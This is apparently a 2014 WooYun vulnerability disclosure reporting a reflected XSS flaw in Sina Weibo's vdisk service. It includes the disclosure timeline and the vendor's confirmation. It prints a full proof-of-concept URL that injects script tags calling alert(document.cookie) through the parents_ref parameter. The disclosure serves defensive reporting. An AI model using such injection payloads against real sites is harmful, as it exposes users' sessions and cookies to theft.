漏洞概要关注数(13)关注此漏洞

漏洞概要
关注数(
13
)
关注此漏洞
缺陷编号：
WooYun-2014-86702
漏洞标题：		新浪微博XSS漏洞一枚
相关厂商：
新浪微博
漏洞作者：
0x 80
提交时间：		2014-12-10 23:05
公开时间：		2015-01-24 23:06
漏洞类型：		xss跨站脚本攻击
危害等级：		低
自评Rank：		4
漏洞状态：		
															厂商已经确认
漏洞来源：
http://www.wooyun.org
Tags标签：
反射型xss
xss利用技巧
0
人收藏
收藏
分享漏洞：
漏洞详情
披露状态：
2014-12-10：	细节已通知厂商并且等待厂商处理中
2014-12-11：	厂商已经确认，细节仅向厂商公开
2014-12-21：	细节向核心白帽子及相关领域专家公开
2014-12-31：	细节向普通白帽子公开
2015-01-10：	细节向实习白帽子公开
2015-01-24：	细节向公众公开
简要描述：
XSS漏洞
详细说明：
http://vdisk.weibo.com/s/FqM2gASvpayTf?category_id=0&parents_ref=FqM2gASvpaz5n%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C
漏洞证明：
code 区域
http://vdisk.weibo.com/s/FqM2gASvpayTf?category_id=0&parents_ref=FqM2gASvpaz5n%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C
修复方案：
版权声明：转载请注明来源
0x 80
@
乌云
漏洞回应
厂商回应：
危害等级：低
漏洞Rank：3
确认时间：2014-12-11 14:49
厂商回复：
感谢关注新浪安全，漏洞修复中。
最新状态：
暂无
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价
(共
0
人评价)
:
登陆后才能进行评分